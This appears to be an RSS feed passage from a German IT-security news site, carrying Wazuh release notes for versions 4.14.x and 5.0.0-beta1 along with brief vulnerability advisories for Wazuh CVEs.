<h2>Agent</h2>
<h3>Added</h3>
<ul>
<li>Added hostname and architecture metadata to Windows keep-alive messages. (<a href="https://github.com/wazuh/wazuh/pull/33831" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/33831/hovercard">#33831</a>)</li>
</ul>
<h3>Fixed</h3>
<ul>
<li>Fixed UTF-16 casting when updating <code>report_changes</code>. (<a href="https://github.com/wazuh/wazuh/pull/33495" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/33495/hovercard">#33495</a>)</li>
<li>Improved Active Response key handling in wazuh-execd. (<a href="https://github.com/wazuh/wazuh/pull/33665" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/33665/hovercard">#33665</a>)</li>
<li>Added bounds checking to Logcollector <code>max-size</code> configuration serialization. (<a href="https://github.com/wazuh/wazuh/pull/33704" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/33704/hovercard">#33704</a>)</li>
<li>Hardened Logcollector multiline backup handling to use full-buffer copies. (<a href="https://github.com/wazuh/wazuh/pull/33926" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/33926/hovercard">#33926</a>)</li>
<li>Fixed label formatting edge cases in keep-alive notify messages. (<a href="https://github.com/wazuh/wazuh/pull/33708" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/33708/hovercard">#33708</a>)</li>
<li>Fixed a false positive in vulnerability detection for Oracle Linux 8. (<a href="https://github.com/wazuh/wazuh/pull/33583" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/33583/hovercard">#33583</a>)</li>
<li>Extended Windows network path restrictions to block extended-length UNC paths. (<a href="https://github.com/wazuh/wazuh/pull/34115" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/34115/hovercard">#34115</a>)</li>
<li>Fixed crash in network path detection on Windows. (<a href="https://github.com/wazuh/wazuh/pull/34162" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/34162/hovercard">#34162</a>)</li>
<li>Fixed Agent reload failure on Linux systems with systemd version 219 or lower. (<a href="https://github.com/wazuh/wazuh/pull/34064" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/34064/hovercard">#34064</a>)</li>
</ul>
<h2>RESTful API</h2>
<h3>Changed</h3>
<ul>
<li>Improved authentication performance by caching generated keypairs and clearing the cache when key files change. (<a href="https://github.com/wazuh/wazuh/pull/33702" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/33702/hovercard">#33702</a>)</li>
</ul>
<h3>Fixed</h3>
<ul>
<li>Improved configuration upload validation by parsing and comparing Wazuh XML configurations more reliably. (<a href="https://github.com/wazuh/wazuh/pull/33683" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/33683/hovercard">#33683</a>)</li>
<li>Fixed protected settings checks when multiple <code>&lt;ossec_config&gt;</code> blocks are present. (<a href="https://github.com/wazuh/wazuh/pull/33807" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/33807/hovercard">#33807</a>)</li>
</ul>
<h2>Ruleset</h2>
<h3>Added</h3>
<ul>
<li>Added a CIS SCA policy for macOS 26 Tahoe. (<a href="https://github.com/wazuh/wazuh/pull/33492" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/33492/hovercard">#33492</a>)</li>
</ul>
<h3>Fixed</h3>
<ul>
<li>Fixed SCA policy execution on Windows Server 2019 by using the correct PowerShell path. (<a href="https://github.com/wazuh/wazuh/pull/34141" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/34141/hovercard">#34141</a>)</li>
</ul>
<h2>Other</h2>
<h3>Changed</h3>
<ul>
<li>Updated the <code>werkzeug</code> dependency to 3.1.4. (<a href="https://github.com/wazuh/wazuh/pull/33569" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/33569/hovercard">#33569</a>)</li>
<li>Updated the <code>urllib3</code> dependency to 2.6.3. (<a href="https://github.com/wazuh/wazuh/pull/33927" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/33927/hovercard">#33927</a>)</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[Wazuh v4.14.4]]></title>
<description><![CDATA[Manager
Fixed

Fixed heap-based null WRITE Buffer Underflows. (34658)

Agent
Fixed

Fixed MS Graph default rules not triggering properly. (#34240)
Unified date formats in Active Response logs to ensure consistent timestamp formatting. (#34473)
Updated Docker integration rules to improve detection...]]></description>
<link>https://tsecurity.de/de/3487835/it-security-tools/wazuh-v4144/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3487835/it-security-tools/wazuh-v4144/</guid>
<pubDate>Tue, 05 May 2026 02:19:37 +0200</pubDate>
<category>💾 IT Security Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>Manager</h2>
<h3>Fixed</h3>
<ul>
<li>Fixed heap-based null WRITE Buffer Underflows. (<a href="https://github.com/wazuh/wazuh/pull/34658" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/34658/hovercard">34658</a>)</li>
</ul>
<h2>Agent</h2>
<h3>Fixed</h3>
<ul>
<li>Fixed MS Graph default rules not triggering properly. (<a href="https://github.com/wazuh/wazuh/pull/34240" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/34240/hovercard">#34240</a>)</li>
<li>Unified date formats in Active Response logs to ensure consistent timestamp formatting. (<a href="https://github.com/wazuh/wazuh/pull/34473" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/34473/hovercard">#34473</a>)</li>
<li>Updated Docker integration rules to improve detection coverage and compatibility. (<a href="https://github.com/wazuh/wazuh/pull/34376" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/34376/hovercard">#34376</a>)</li>
<li>Fixed heap-based NULL write buffer underflow in <code>GetAlertData</code>. (<a href="https://github.com/wazuh/wazuh/pull/34501" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/34501/hovercard">#34501</a>)</li>
<li>Retained MSI installer log after Windows agent upgrade to improve troubleshooting visibility. (<a href="https://github.com/wazuh/wazuh/pull/34517" data-hovercard-type="issue" data-hovercard-url="/wazuh/wazuh/issues/34517/hovercard">#34517</a>)</li>
<li>Fixed incorrect Windows 11 edition detection after upgrading the agent to version 4.14.3. (<a href="https://github.com/wazuh/wazuh/pull/34530" data-hovercard-type="issue" data-hovercard-url="/wazuh/wazuh/issues/34530/hovercard">#34530</a>)</li>
<li>Fixed macOS agent crash during syscollector reload caused by invalid <code>pthread_cond_destroy()</code> usage. (<a href="https://github.com/wazuh/wazuh/pull/34274" data-hovercard-type="issue" data-hovercard-url="/wazuh/wazuh/issues/34274/hovercard">#34274</a>)</li>
<li>Fixed Windows OS edition detection. (<a href="https://github.com/wazuh/wazuh/pull/34540" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/34540/hovercard">34540</a>)</li>
<li>Fix pthread_mutex_destroy invalid argument error on AIX in syscollector. (<a href="https://github.com/wazuh/wazuh/pull/34900" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/34900/hovercard">#34900</a>)</li>
</ul>
<h3>Changed</h3>
<ul>
<li>Changed msi_output extension from txt to log. (<a href="https://github.com/wazuh/wazuh/pull/34541" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/34541/hovercard">34541</a>)</li>
<li>Changed to unsigned char in print_hex_string. (<a href="https://github.com/wazuh/wazuh/pull/34602" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/34602/hovercard">34602</a>)</li>
<li>Changed sync primitive disposal to stop and soften teardown failures. (<a href="https://github.com/wazuh/wazuh/pull/34552" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/34552/hovercard">34552</a>)</li>
</ul>
<h2>RESTful API</h2>
<h3>Fixed</h3>
<ul>
<li>Fixed timestamps in the <code>/agents/upgrade_result</code> endpoint to return accurate UTC time. (<a href="https://github.com/wazuh/wazuh/pull/34176" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/34176/hovercard">#34176</a>)</li>
<li>Improved cluster file synchronization path handling by adding safe path joins. (<a href="https://github.com/wazuh/wazuh/pull/34464" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/34464/hovercard">#34464</a>)</li>
<li>Fixed API login race condition- (<a href="https://github.com/wazuh/wazuh/pull/34459" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/34459/hovercard">34459</a>)</li>
</ul>
<h2>Other</h2>
<h3>Changed</h3>
<ul>
<li>Updated the <code>azure-core</code> dependency to 1.38.0 and the <code>Werkzeug</code> dependency to 3.1.5. (<a href="https://github.com/wazuh/wazuh/pull/34154" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/34154/hovercard">#34154</a>)</li>
<li>Updated the <code>protobuf</code> dependency to 5.29.6 and the <code>python-multipart</code> dependency to 0.0.22. (<a href="https://github.com/wazuh/wazuh/pull/34403" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/34403/hovercard">#34403</a>)</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[Wazuh v5.0.0-beta1]]></title>
<description><![CDATA[Manager
Added

Added cluster-by-default deployment model: all Wazuh Server installations now run as a cluster node, removing the distinction between clustered and non-clustered deployments. The cluster.disabled configuration option has been removed. (#31295)
Added stateless metadata enrichment in...]]></description>
<link>https://tsecurity.de/de/3487824/it-security-tools/wazuh-v500-beta1/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3487824/it-security-tools/wazuh-v500-beta1/</guid>
<pubDate>Tue, 05 May 2026 02:19:21 +0200</pubDate>
<category>💾 IT Security Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>Manager</h2>
<h3>Added</h3>
<ul>
<li>Added cluster-by-default deployment model: all Wazuh Server installations now run as a cluster node, removing the distinction between clustered and non-clustered deployments. The <code>cluster.disabled</code> configuration option has been removed. (<a href="https://github.com/wazuh/wazuh/issues/31295" data-hovercard-type="issue" data-hovercard-url="/wazuh/wazuh/issues/31295/hovercard">#31295</a>)</li>
<li>Added stateless metadata enrichment in <code>remoted</code>, centralizing event metadata handling for stateless messages and removing the dependency on <code>wazuh-db</code> for that ingestion path. (<a href="https://github.com/wazuh/wazuh/issues/33269" data-hovercard-type="issue" data-hovercard-url="/wazuh/wazuh/issues/33269/hovercard">#33269</a>)</li>
<li>Added Engine enrichment support: IOC matching, GeoIP lookup, and event filters. (<a href="https://github.com/wazuh/wazuh/issues/33493" data-hovercard-type="issue" data-hovercard-url="/wazuh/wazuh/issues/33493/hovercard">#33493</a>)</li>
<li>Added Engine adaptation tier 2: raw archives handling, uncategorized event routing, input-level throttling, and internal metrics exposure. (<a href="https://github.com/wazuh/wazuh/issues/34477" data-hovercard-type="issue" data-hovercard-url="/wazuh/wazuh/issues/34477/hovercard">#34477</a>)</li>
<li>Added Wazuh Instance Registration status to reflect CTI <code>access_token</code> availability (<code>Pending</code>, <code>Polling</code>, <code>Denied</code>, <code>Available</code>), allowing the Dashboard to query the subscription state. (<a href="https://github.com/wazuh/wazuh/pull/31906" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/31906/hovercard">#31906</a>)</li>
</ul>
<h3>Changed</h3>
<ul>
<li>Upgraded embedded Python interpreter from 3.10 to 3.12. (<a href="https://github.com/wazuh/wazuh/issues/33377" data-hovercard-type="issue" data-hovercard-url="/wazuh/wazuh/issues/33377/hovercard">#33377</a>) (<a href="https://github.com/wazuh/wazuh/issues/33570" data-hovercard-type="issue" data-hovercard-url="/wazuh/wazuh/issues/33570/hovercard">#33570</a>)</li>
<li>Adapted Vulnerability Detector input pipeline to the new Wazuh 5.0 synchronization algorithm, covering first-scan, inventory-change, and feed-update scenarios. (<a href="https://github.com/wazuh/wazuh/issues/30535" data-hovercard-type="issue" data-hovercard-url="/wazuh/wazuh/issues/30535/hovercard">#30535</a>)</li>
<li>Revamped Role-Based Access Control (RBAC) management and introduced an upgrade mechanism for existing RBAC configurations. (<a href="https://github.com/wazuh/wazuh/issues/27706" data-hovercard-type="issue" data-hovercard-url="/wazuh/wazuh/issues/27706/hovercard">#27706</a>)</li>
<li>Removed legacy configuration surfaces, database schemas, build targets, and compatibility layers in the second server cleanup phase. (<a href="https://github.com/wazuh/wazuh/issues/34608" data-hovercard-type="issue" data-hovercard-url="/wazuh/wazuh/issues/34608/hovercard">#34608</a>)</li>
</ul>
<h3>Removed</h3>
<ul>
<li>Removed Filebeat as the log-shipping component; event forwarding now uses native Wazuh server connectivity to the Wazuh Indexer via <code>indexer-connector</code>. (<a href="https://github.com/wazuh/wazuh/pull/33124" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/33124/hovercard">#33124</a>)</li>
<li>Removed deprecated manager daemons: <code>ossec-authd</code>, <code>wazuh-agentlessd</code>, <code>wazuh-maild</code>, <code>wazuh-dbd</code>. (<a href="https://github.com/wazuh/wazuh/issues/30922" data-hovercard-type="issue" data-hovercard-url="/wazuh/wazuh/issues/30922/hovercard">#30922</a>)</li>
<li>Removed deprecated C CLI tools: <code>manage_agents</code>, <code>agent-auth</code>. (<a href="https://github.com/wazuh/wazuh/issues/30924" data-hovercard-type="issue" data-hovercard-url="/wazuh/wazuh/issues/30924/hovercard">#30924</a>)</li>
<li>Removed OpenSCAP server-side module. (<a href="https://github.com/wazuh/wazuh/issues/31028" data-hovercard-type="issue" data-hovercard-url="/wazuh/wazuh/issues/31028/hovercard">#31028</a>)</li>
<li>Removed inventory-related API endpoints. (<a href="https://github.com/wazuh/wazuh/issues/31299" data-hovercard-type="issue" data-hovercard-url="/wazuh/wazuh/issues/31299/hovercard">#31299</a>)</li>
<li>Removed legacy API security configuration endpoints. (<a href="https://github.com/wazuh/wazuh/issues/28425" data-hovercard-type="issue" data-hovercard-url="/wazuh/wazuh/issues/28425/hovercard">#28425</a>)</li>
</ul>
<h3>Fixed</h3>
<ul>
<li>Fixed Vulnerability Detector version matcher logic for improved detection accuracy. (<a href="https://github.com/wazuh/wazuh/issues/31746" data-hovercard-type="issue" data-hovercard-url="/wazuh/wazuh/issues/31746/hovercard">#31746</a>)</li>
<li>Fixed Cloudtrail log ingestion parsing errors. (<a href="https://github.com/wazuh/wazuh/issues/33108" data-hovercard-type="issue" data-hovercard-url="/wazuh/wazuh/issues/33108/hovercard">#33108</a>)</li>
</ul>
<h2>Agent</h2>
<h3>Added</h3>
<ul>
<li>Added local state persistence for agent modules (FIM, System Inventory, SCA), removing the dependency on <code>rsync</code> with the Wazuh Server and reducing network traffic and server-side processing overhead. (<a href="https://github.com/wazuh/wazuh/issues/29533" data-hovercard-type="issue" data-hovercard-url="/wazuh/wazuh/issues/29533/hovercard">#29533</a>) (<a href="https://github.com/wazuh/wazuh/issues/31838" data-hovercard-type="issue" data-hovercard-url="/wazuh/wazuh/issues/31838/hovercard">#31838</a>)</li>
</ul>
<h3>Changed</h3>
<ul>
<li>Changed the Wazuh Manager installation path to <code>/var/wazuh-manager</code> (replacing <code>/var/ossec</code>) and removed agent ID <code>000</code>, fully decoupling agent and manager processes on shared hosts. (<a href="https://github.com/wazuh/wazuh/issues/33378" data-hovercard-type="issue" data-hovercard-url="/wazuh/wazuh/issues/33378/hovercard">#33378</a>)</li>
<li>Changed Vulnerability Detection to use the Wazuh Indexer as the sole authoritative CVE data source, removing direct CTI network access from the agent-side Vulnerability Detector. (<a href="https://github.com/wazuh/wazuh/issues/34849" data-hovercard-type="issue" data-hovercard-url="/wazuh/wazuh/issues/34849/hovercard">#34849</a>)</li>
<li>Adjusted agent-side Vulnerability Detector inventory emission and synchronization (OS, packages, hotfixes) to align with the updated VD behavior in Wazuh 5.0. (<a href="https://github.com/wazuh/wazuh/issues/33199" data-hovercard-type="issue" data-hovercard-url="/wazuh/wazuh/issues/33199/hovercard">#33199</a>)</li>
<li>Simplified rootcheck: removed the server-side database, sync path, and API surface; findings are now indexed through the standard alert pipeline. (<a href="https://github.com/wazuh/wazuh/issues/31478" data-hovercard-type="issue" data-hovercard-url="/wazuh/wazuh/issues/31478/hovercard">#31478</a>)</li>
<li>Updated logcollector file-tailing initial read strategy for more consistent behavior across log rotation scenarios. (<a href="https://github.com/wazuh/wazuh/issues/33382" data-hovercard-type="issue" data-hovercard-url="/wazuh/wazuh/issues/33382/hovercard">#33382</a>)</li>
<li>Updated Windows Event Channel log collection to emit native XML from <code>EvtRender()</code> without an XML declaration header. (<a href="https://github.com/wazuh/wazuh/issues/34462" data-hovercard-type="issue" data-hovercard-url="/wazuh/wazuh/issues/34462/hovercard">#34462</a>)</li>
<li>Increased default limits for agent event throughput and inventory message sizes. (<a href="https://github.com/wazuh/wazuh/issues/35330" data-hovercard-type="issue" data-hovercard-url="/wazuh/wazuh/issues/35330/hovercard">#35330</a>)</li>
</ul>
<h3>Removed</h3>
<ul>
<li>Removed deprecated agent binaries and legacy modules as part of the Wazuh 5.0 agent cleanup. (<a href="https://github.com/wazuh/wazuh/issues/30435" data-hovercard-type="issue" data-hovercard-url="/wazuh/wazuh/issues/30435/hovercard">#30435</a>)</li>
<li>Removed NSIS-based Windows agent installer; Windows agent now ships exclusively as an MSI package. (<a href="https://github.com/wazuh/wazuh/issues/31582" data-hovercard-type="issue" data-hovercard-url="/wazuh/wazuh/issues/31582/hovercard">#31582</a>)</li>
</ul>
<h3>Fixed</h3>
<ul>
<li>Fixed FIM checksum calculation that was incorrectly ignoring some file fields. (<a href="https://github.com/wazuh/wazuh/issues/29668" data-hovercard-type="issue" data-hovercard-url="/wazuh/wazuh/issues/29668/hovercard">#29668</a>)</li>
<li>Fixed syscollector reporting duplicate and bogus packages on macOS arm64. (<a href="https://github.com/wazuh/wazuh/issues/30513" data-hovercard-type="issue" data-hovercard-url="/wazuh/wazuh/issues/30513/hovercard">#30513</a>)</li>
<li>Fixed <code>agent_control</code> not displaying agent status information. (<a href="https://github.com/wazuh/wazuh/issues/32915" data-hovercard-type="issue" data-hovercard-url="/wazuh/wazuh/issues/32915/hovercard">#32915</a>)</li>
<li>Fixed SCA handling of invalid operators and missing values in regex patterns. (<a href="https://github.com/wazuh/wazuh/issues/35071" data-hovercard-type="issue" data-hovercard-url="/wazuh/wazuh/issues/35071/hovercard">#35071</a>)</li>
<li>Fixed agent modules initializing before agent metadata was fully ready. (<a href="https://github.com/wazuh/wazuh/issues/35156" data-hovercard-type="issue" data-hovercard-url="/wazuh/wazuh/issues/35156/hovercard">#35156</a>)</li>
<li>Fixed FIM inventory reporting file modification time as 1970-01-01. (<a href="https://github.com/wazuh/wazuh/issues/35162" data-hovercard-type="issue" data-hovercard-url="/wazuh/wazuh/issues/35162/hovercard">#35162</a>)</li>
<li>Fixed agent automatic reload failing after receiving centralized configuration. (<a href="https://github.com/wazuh/wazuh/issues/35169" data-hovercard-type="issue" data-hovercard-url="/wazuh/wazuh/issues/35169/hovercard">#35169</a>)</li>
<li>Fixed syscollector false positive package detection on macOS. (<a href="https://github.com/wazuh/wazuh/issues/35248" data-hovercard-type="issue" data-hovercard-url="/wazuh/wazuh/issues/35248/hovercard">#35248</a>)</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[Wazuh v4.14.5]]></title>
<description><![CDATA[Manager
Fixed

Fixed DAPI callable resolution to restrict invocations to exposed resources only. (#34889)
Fixed uncontrolled memory allocation in cluster caused by crafted packet length. (#35173) (#35412)
Fixed rate limit bypass for the /events endpoint. (#35077)
Fixed buffer overflow in analysis...]]></description>
<link>https://tsecurity.de/de/3487820/it-security-tools/wazuh-v4145/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3487820/it-security-tools/wazuh-v4145/</guid>
<pubDate>Tue, 05 May 2026 02:19:15 +0200</pubDate>
<category>💾 IT Security Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>Manager</h2>
<h3>Fixed</h3>
<ul>
<li>Fixed DAPI callable resolution to restrict invocations to exposed resources only. (<a href="https://github.com/wazuh/wazuh/pull/34889" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/34889/hovercard">#34889</a>)</li>
<li>Fixed uncontrolled memory allocation in cluster caused by crafted packet length. (<a href="https://github.com/wazuh/wazuh/pull/35173" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35173/hovercard">#35173</a>) (<a href="https://github.com/wazuh/wazuh/pull/35412" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35412/hovercard">#35412</a>)</li>
<li>Fixed rate limit bypass for the <code>/events</code> endpoint. (<a href="https://github.com/wazuh/wazuh/pull/35077" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35077/hovercard">#35077</a>)</li>
<li>Fixed buffer overflow in analysisd regex match processing. (<a href="https://github.com/wazuh/wazuh/pull/35106" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35106/hovercard">#35106</a>)</li>
<li>Fixed path traversal in authd via agent group name validation. (<a href="https://github.com/wazuh/wazuh/pull/35230" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35230/hovercard">#35230</a>)</li>
<li>Fixed size_t underflow in remoted ReadSecMSG causing potential heap overflow. (<a href="https://github.com/wazuh/wazuh/pull/35193" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35193/hovercard">#35193</a>)</li>
<li>Fixed RBAC bypass in DAPI allowing privilege escalation. (<a href="https://github.com/wazuh/wazuh/pull/35307" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35307/hovercard">#35307</a>)</li>
<li>Fixed analysisd plugin decoder argument alignment. (<a href="https://github.com/wazuh/wazuh/pull/35176" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35176/hovercard">#35176</a>)</li>
</ul>
<h2>Agent</h2>
<h3>Fixed</h3>
<ul>
<li>Fixed rootcheck false positive for /dev/.blkid.tab. (<a href="https://github.com/wazuh/wazuh/pull/34734" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/34734/hovercard">#34734</a>)</li>
<li>Fixed ORDER_REVERSAL deadlocks in FIM. (<a href="https://github.com/wazuh/wazuh/pull/34735" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/34735/hovercard">#34735</a>)</li>
<li>Fixed Roundcube decoder regex to prevent srcip truncation in "Failed login ... in session" logs. (<a href="https://github.com/wazuh/wazuh/pull/34793" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/34793/hovercard">#34793</a>)</li>
<li>Fixed macOS Ventura SCA policy incorrectly passing pmset checks. (<a href="https://github.com/wazuh/wazuh/pull/34693" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/34693/hovercard">#34693</a>)</li>
<li>Fixed Office365 integration pagination by trimming HTTP header values. (<a href="https://github.com/wazuh/wazuh/pull/34673" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/34673/hovercard">#34673</a>)</li>
<li>Fixed FIM false positives caused by double readdir check. (<a href="https://github.com/wazuh/wazuh/pull/34880" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/34880/hovercard">#34880</a>)</li>
<li>Fixed audit log cache overflow for events with many records in logcollector. (<a href="https://github.com/wazuh/wazuh/pull/35285" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35285/hovercard">#35285</a>)</li>
<li>Fixed daily marker for GuardDuty log collector. (<a href="https://github.com/wazuh/wazuh/pull/35110" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35110/hovercard">#35110</a>)</li>
<li>Fixed rootcheck not generating findings. (<a href="https://github.com/wazuh/wazuh/pull/35297" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35297/hovercard">#35297</a>)</li>
<li>Fixed heap buffer overflow in syscheck Registry Wildcard Expansion. (<a href="https://github.com/wazuh/wazuh/pull/35287" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35287/hovercard">#35287</a>)</li>
</ul>
<h3>Changed</h3>
<ul>
<li>Changed RHEL init script with SUSE variant on SLES 11. (<a href="https://github.com/wazuh/wazuh/pull/34563" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/34563/hovercard">#34563</a>)</li>
<li>Changed service check from WMI to sc.exe. (<a href="https://github.com/wazuh/wazuh/pull/34543" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/34543/hovercard">#34543</a>)</li>
<li>Changed windows syscollector to include command arguments. (<a href="https://github.com/wazuh/wazuh/pull/34727" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/34727/hovercard">#34727</a>)</li>
</ul>
<h2>RESTful API</h2>
<h3>Fixed</h3>
<ul>
<li>Fixed <code>allow_higher_versions</code> validation in API <code>upload_configuration</code>. (<a href="https://github.com/wazuh/wazuh/pull/34905" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/34905/hovercard">#34905</a>)</li>
<li>Fixed nested JSON depth limit in API request processing. (<a href="https://github.com/wazuh/wazuh/pull/35224" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35224/hovercard">#35224</a>)</li>
<li>Fixed upload size limit config mismatch. (<a href="https://github.com/wazuh/wazuh/pull/35141" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35141/hovercard">#35141</a>)</li>
</ul>
<h2>Ruleset</h2>
<h3>Fixed</h3>
<ul>
<li>Fixed bug in CIS SCA checks 35675 and 35689 for Ubuntu 24.04. (<a href="https://github.com/wazuh/wazuh/pull/35088" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35088/hovercard">#35088</a>)</li>
<li>Fixed Dovecot decoders to correctly extract <code>rip</code> and <code>lip</code> fields. (<a href="https://github.com/wazuh/wazuh/pull/35089" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35089/hovercard">#35089</a>)</li>
</ul>
<h2>Other</h2>
<h3>Changed</h3>
<ul>
<li>Updated dependencies <code>cryptography</code> to 46.0.5, <code>Werkzeug</code> to 3.1.6, <code>pip</code> to 26.0.1 and <code>wheel</code> to 0.46.3. (<a href="https://github.com/wazuh/wazuh/pull/34907" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/34907/hovercard">#34907</a>)</li>
<li>Updated embedded Python to 3.10.20 and dependencies pyjwt, pyasn1. (<a href="https://github.com/wazuh/wazuh/pull/35135" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35135/hovercard">#35135</a>)</li>
<li>Updated dependencies cryptography, requests. (<a href="https://github.com/wazuh/wazuh/pull/35331" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35331/hovercard">#35331</a>)</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[coverity-w17-4.14.6: Merge pull request #35724 from wazuh/bug/4263-fix-integration-tests]]></title>
<description><![CDATA[Fix flaky API IT]]></description>
<link>https://tsecurity.de/de/3487819/it-security-tools/coverity-w17-4146-merge-pull-request-35724-from-wazuhbug4263-fix-integration-tests/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3487819/it-security-tools/coverity-w17-4146-merge-pull-request-35724-from-wazuhbug4263-fix-integration-tests/</guid>
<pubDate>Tue, 05 May 2026 02:19:14 +0200</pubDate>
<category>💾 IT Security Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Fix flaky API IT</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-26206 | Wazuh up to 4.14.3 authenticate excessive authentication (EUVD-2026-26268)]]></title>
<description><![CDATA[A vulnerability, which was classified as problematic, was found in Wazuh up to 4.14.3. Affected is an unknown function of the file /security/user/authenticate. Such manipulation leads to improper restriction of excessive authentication attempts.

This vulnerability is traded as CVE-2026-26206. Th...]]></description>
<link>https://tsecurity.de/de/3475852/sicherheitsluecken/cve-2026-26206-wazuh-up-to-4143-authenticate-excessive-authentication-euvd-2026-26268/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3475852/sicherheitsluecken/cve-2026-26206-wazuh-up-to-4143-authenticate-excessive-authentication-euvd-2026-26268/</guid>
<pubDate>Wed, 29 Apr 2026 23:38:15 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/kb/risk">problematic</a>, was found in <a href="https://vuldb.com/product/wazuh">Wazuh up to 4.14.3</a>. Affected is an unknown function of the file <em>/security/user/authenticate</em>. Such manipulation leads to improper restriction of excessive authentication attempts.

This vulnerability is traded as <a href="https://vuldb.com/cve/CVE-2026-26206">CVE-2026-26206</a>. The attack may be launched remotely. There is no exploit available.

You should upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-30893 | Wazuh up to 4.14.3 Cluster Synchronization Extraction Routine path traversal (EUVD-2026-26271)]]></title>
<description><![CDATA[A vulnerability labeled as critical has been found in Wazuh up to 4.14.3. This issue affects some unknown processing of the component Cluster Synchronization Extraction Routine. Such manipulation leads to path traversal.

This vulnerability is listed as CVE-2026-30893. The attack may be performed...]]></description>
<link>https://tsecurity.de/de/3475850/sicherheitsluecken/cve-2026-30893-wazuh-up-to-4143-cluster-synchronization-extraction-routine-path-traversal-euvd-2026-26271/</link>
